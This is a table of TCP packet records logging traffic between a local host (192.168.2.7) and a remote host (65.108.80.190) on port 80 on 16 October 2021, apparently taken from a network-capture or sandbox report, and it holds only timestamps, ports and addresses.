Oct 16, 2021 16:53:24.617105961 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.617125034 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.648677111 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.648962975 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.649008036 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.649070024 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.649133921 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.649156094 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.649154902 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.649178028 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.649202108 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.649223089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.649245024 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.649266958 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.649270058 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.649322987 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.656692982 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.656718016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.656730890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.656747103 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.656761885 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.656779051 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.656796932 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.656812906 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.656829119 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.656925917 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.657025099 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.657098055 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.182845116 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.222263098 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222300053 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222325087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222347021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222368956 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222397089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222419977 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222443104 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222467899 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222492933 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222517014 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222539902 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.222552061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222570896 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222579956 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.222596884 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222621918 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222630024 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.222644091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222666979 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222691059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222706079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.222719908 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222744942 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222769022 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222776890 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.222793102 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222815990 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222839117 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222840071 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.222862005 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222884893 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222889900 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.222912073 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222935915 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222958088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.222960949 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.222985029 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223007917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223031044 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223036051 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.223056078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223078966 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223103046 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.223105907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223148108 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223172903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223174095 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.223196983 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223222017 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223227024 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.223246098 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223269939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223293066 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223309994 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.223318100 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223342896 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223345995 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.223368883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223392010 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223416090 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.223428011 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.223527908 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.263365984 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.263520956 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265048981 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265132904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265160084 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265202045 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265206099 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265232086 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265237093 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265244007 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265279055 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265315056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265348911 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265393019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265431881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265444040 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265455008 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265459061 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265465021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265502930 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265525103 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265537977 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265572071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265595913 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265605927 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265640974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265685081 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265691996 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265723944 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265758038 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265764952 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265794039 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265829086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265831947 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265861034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265892029 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265896082 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265929937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.265949965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.265973091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266012907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266014099 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266047001 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266082048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266104937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266115904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266149044 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266184092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266189098 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266217947 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266262054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266263008 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266300917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266330957 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266334057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266369104 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266385078 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266403913 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266437054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266463995 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266472101 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266508102 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266551971 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266552925 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266590118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266623974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266625881 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266659021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266681910 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266695023 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266727924 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266743898 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266762018 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266796112 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266830921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266839027 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266880035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266915083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266930103 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.266949892 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266985893 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.266997099 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267019987 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267057896 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267069101 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267092943 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267126083 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267168999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267205954 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267215014 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267254114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267288923 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267301083 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267326117 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267369032 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267374039 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267421007 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267422915 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267481089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267529011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267565966 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267576933 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267626047 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267628908 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267669916 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267676115 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267731905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267761946 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267786980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267837048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267846107 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267884970 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267930984 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.267935991 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.267987967 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268007040 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268039942 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268073082 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268090010 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268150091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268158913 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268234015 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268260002 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268282890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268332005 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268388033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268403053 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268416882 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268428087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268459082 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268464088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268501997 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268536091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268547058 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268572092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268604994 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268605947 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268651009 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268671036 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268690109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268724918 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268728018 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268760920 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268796921 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.268810034 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.268903017 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308171034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308360100 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308541059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308564901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308581114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308595896 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308609009 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308619976 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308634996 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308644056 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308646917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308662891 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308671951 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308675051 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308681011 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308687925 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308687925 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308698893 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308711052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308722019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308733940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308736086 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308746099 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308751106 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308770895 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308789015 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.308954000 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308973074 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308984041 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.308995962 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309011936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309031963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309045076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309048891 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309056997 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309068918 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309070110 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309077978 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309081078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309093952 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309106112 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309117079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309117079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309129953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309146881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309158087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309160948 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309170008 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309179068 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309181929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309194088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309205055 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309205055 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309218884 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309248924 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309267044 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309278011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309288979 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309381008 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309398890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309410095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309422016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309427023 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309434891 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309444904 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309452057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309468985 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309484959 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309485912 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309498072 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309498072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309511900 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309514046 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309524059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309535980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309551954 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309566021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309577942 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309590101 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309595108 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309606075 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309617996 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309628963 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.309629917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309643030 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309658051 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309673071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309684992 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309696913 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309709072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309720993 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309741020 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309757948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309772968 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.309786081 CEST	80	49737	65.108.80.190	192.168.2.7
